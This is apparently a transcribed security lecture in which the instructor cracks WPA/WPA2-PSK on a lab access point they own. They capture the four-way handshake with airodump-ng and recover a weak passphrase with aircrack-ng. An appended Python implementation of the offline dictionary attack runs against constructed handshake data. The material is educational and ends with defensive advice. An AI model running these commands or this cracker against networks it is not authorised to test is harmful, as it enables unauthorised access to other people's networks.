WPA and WPA2 are very good encryptions. If you're using WPA, you're using RC4, but you're using TKIP with that. And if you're using WPA2, well, you're using AES with CCMP. And you are not going to be able to crack these passwords, except for one little problem. And the problem is, the initial connection between a wireless WPA or WPA2 client and an access point has what we call a four-way handshake.
And not that many years ago, there was a small weakness discovered in this four-way handshake that allows us to do something very interesting. Now, I need to be careful here. When you're cracking WEP, you can mathematically derive the password just by looking at packets. You can't do that with WPA and WPA2. With WPA and WPA2, think instead that you've got this guy who's really good at turning the numbers on a bicycle lock and then pulling on it. So you can go to this guy and say, "Hey, try 0000."
And he could do that real quick and pull on it. So if you wanted to, you could tell this guy to start with all zeros and then just keep going up to 9999. Now, if there were only that many, that would be 10,000 different permutations, and that would work great. But with WPA/WPA2, take that same bike lock analogy and turn it from four digits to something like 128 digits. So it would take that guy, even if he was fast, a very, very long time to go through all of these. Luckily for us, we know that human beings don't use good, randomized, long passwords. We know that most human beings are going to use something like a phrase and then a number, or their pet's name and then the date they were born, or the number of kids they have and their wife's name and the date they got married.
Little simple things like that. And if we know that, we can tell the guy who's spinning that bicycle lock, "No, no, no, don't start at the zeros. Just try all of these first." So we've got to give this WPA/WPA2 cracker what we call a dictionary file. Now, a dictionary file is nothing more than a big text file that is full.
And I mean full of tens of millions of different permutations of well-known words with numbers and all kinds of different things. Now you think, well, tens of millions; well, compared to that 128th-power stuff, 10 million, even my laptop, give it a day, could knock all that stuff out. So that makes a big difference. So what we're going to be doing with WPA/WPA2 is we're going to go ahead and grab, not a whole bunch of packets; what we're going to grab is those four-way handshakes when people start to connect. And using that, we can derive the passwords by using a dictionary file, basically saying, "Try all these," and if people use them, then we're going to have them. So let's go ahead and start off. Let me show you how the setup works this time.
So I've got my same wireless access point. Now, he's still set to WEP at this moment, so we're going to change him to regular old WPA-PSK and get him up and running. And we'll put a really weak password on here, and then we're going to go back over to the Kali box. And in this case, what we're going to do is we're still going to monitor the traffic, but we're just going to wait for somebody to authenticate, and then we've got to run the cracker. And with luck, since it's a weak password, we're going to be able to get it pretty easily. So let's take a look at the setup.
Alright, so let's go over here. And first of all, instead of calling it "not secure WEP", let's call it "not secure WPA". And let me apply that. Well, wait a second. Now the next thing I'm going to do is go over to wireless security. And we're going to take off WEP and let's go to WPA Personal. This type of attack will work with WPA or WPA2 Personal pre-shared key.
So I've already got a password in here, and I want to keep it simple: the password is TimmyTimmy. So it's a pretty simple password. It's just a very common word used twice. So let me go ahead and apply all this. We'll save it. And we're pretty much ready to go.
So this guy is now WPA Personal. He has a very simple password of TimmyTimmy. And now what we're going to do is go over here, and we're going to grab a bunch of data, but in particular, we're not just grabbing data, we're looking for handshakes, and that's where airodump-ng does a great job. Let me show you. Now, what I've got here is airodump-ng still running on my screen. Now, if you take a look right here at the top, you're going to see there's "not secure WPA"; you can even see that it's WPA.
And it's running TKIP, no great surprise there, and there's the MAC address for it. So what we're going to do now is start airodump-ng, and we're going to watch for handshakes. I'm going to put all the stuff that it finds into a file called wpafile. And this guy's on channel 6, and I'll give it the BSSID, the MAC address we just saw. And we're going to tell it to listen on wlan0mon.
So what we're going to do now is just keep watching this and see if somebody comes in. There it is. Wow, that was really quick. Let's rewind that a little bit so we can see it. What we just saw there was a handshake, and it flashed really, really quick, so I kind of missed it.
But what we now know is that we have a file of captures that includes at least one, if not two, handshakes. I've got a bunch of people in the studio all trying to connect at the same time, so hopefully we got a bunch. So let's go ahead and take a look at that file and see if we can pull the password out. So we can go ahead and just turn this off.
And let me make sure we've got a dictionary file in there. There it is: way up at the top you see the word "dictionary"; that's a dictionary file that I've created. So to actually go about the cracking, we just go ahead and run aircrack-ng. The -a 2 means I'm doing a WPA attack on this guy. Then I've got to tell it where my dictionary file is. It's right here in the same folder, so I just type in "dictionary". And then I tell it which file I want to crack.
In this case, it's going to be wpafile-01.cap. Hit Enter, and ta-da, there it is, right there. See it? TimmyTimmy. Pretty easy stuff. Now, you'd be looking at this and you're going to say, "Wait a minute, wait, wait, wait, wait, wait. You put the right password into your dictionary file?" Yeah, I did, but I did that just to speed up this demonstration. Trust me, there are huge dictionary files out there, and they've got TimmyTimmy in there just as easily. If you have a weak WPA or WPA2 PSK, odds are good that people will be able to crack it almost as quickly as what I've done right here. The right answer is simple.
Use long, complex pre-shared keys when you're dealing with WPA and WPA2. A lot of people recommend not using any human words, and make sure you use at least 20 characters, which can sometimes be hard to remember, but boy, does it make it secure. Okay, so now that we've cracked WEP and WPA/WPA2, we can actually make life a lot easier cracking with WPS.
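What aircrack-ng is doing during the "try all of these" step, written out as an added Python example; this is not the lecture's code or the aircrack-ng project's code. It derives the PMK from each dictionary word with PBKDF2, derives the key confirmation key (KCK) from the PMK plus the MAC addresses and nonces that are visible in the captured handshake, recomputes the MIC on handshake message 2, and stops at the first word whose MIC matches the captured one. The SSID, MAC addresses, nonces and EAPOL frame bytes are all constructed here (the "capture" is built from the known passphrase TimmyTimmy so there is a real MIC to check against); no real network is involved. Both MIC variants the lecture mentions are covered: HMAC-MD5 for WPA/TKIP and HMAC-SHA1 for WPA2/CCMP.

```python
"""Offline dictionary attack on a captured WPA/WPA2-PSK four-way handshake.

Added example, not the lecture's or aircrack-ng's code. SSID, MACs, nonces and
frame bytes are constructed; the "captured" message 2 is built from the known
passphrase so the attack has a genuine MIC to verify candidates against.
"""
import hashlib
import hmac

# EAPOL-Key descriptor version: 1 = WPA/TKIP (HMAC-MD5 MIC), 2 = WPA2/CCMP (HMAC-SHA1 MIC)
VERSION_WPA_TKIP = 1
VERSION_WPA2_CCMP = 2

# Byte offsets inside an EAPOL-Key frame (4-byte EAPOL header + key descriptor fields)
NONCE_OFFSET = 17
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are what make every dictionary word cost real CPU time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_kck(pmk, ap_mac, client_mac, anonce, snonce):
    """Key Confirmation Key = first 128 bits of the PTK. Everything here except the
    PMK (both MACs, both nonces) is sent in the clear, hence the offline attack."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, eapol, version):
    """MIC over the EAPOL-Key frame with its own MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if version == VERSION_WPA_TKIP else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def crack(ssid, ap_mac, client_mac, anonce, eapol_msg2, version, wordlist):
    """Try each candidate; return the first whose recomputed MIC matches, else None."""
    snonce = eapol_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 chars; skip the rest
            continue
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)
        if eapol_mic(kck, eapol_msg2, version) == captured_mic:
            return candidate
    return None


def build_eapol_msg2(snonce, version):
    """Constructed handshake message 2 (client -> AP) with a zeroed MIC field."""
    key_info = (0x0108 | version).to_bytes(2, "big")   # Pairwise + MIC flags + descriptor version
    body = (b"\x02"                     # descriptor type (RSN)
            + key_info
            + (0).to_bytes(2, "big")    # key length
            + (1).to_bytes(8, "big")    # replay counter
            + snonce                    # key nonce (SNonce)
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # key ID
            + b"\x00" * MIC_LEN         # MIC, filled in by the client
            + (0).to_bytes(2, "big"))   # key data length (no RSN IE in this toy frame)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key


def make_constructed_capture(passphrase, ssid, ap_mac, client_mac, anonce, snonce, version):
    """Stand-in for the airodump-ng capture: message 2 carrying the client's real MIC."""
    frame = build_eapol_msg2(snonce, version)
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, version) + frame[MIC_OFFSET + MIC_LEN:]


# Constructed demo values (made up; not from any real network)
SSID = "notsecureWPA"
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
DICTIONARY = ["password", "12345678", "timmy", "letmein123", "TimmyTimmy", "qwertyuiop"]


def demo(version=VERSION_WPA_TKIP):
    """Build the 'capture' with the weak passphrase, then recover it from DICTIONARY."""
    msg2 = make_constructed_capture("TimmyTimmy", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, version)
    return crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2, version, DICTIONARY)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

In the lecture's workflow, airodump-ng writes the handshake frames to wpafile-01.cap and aircrack-ng -a 2 -w dictionary wpafile-01.cap runs the same loop at scale, pulling the SSID, both MAC addresses and both nonces out of the capture. That is also the practical check: without a message 2 (or 3) carrying a MIC plus the other side's nonce, there is nothing to verify candidates against, which is why the demo has to wait for a client to actually connect. The only thing the attacker cannot see is the passphrase, so a passphrase that is not in any wordlist (long, no dictionary words) is what defeats this.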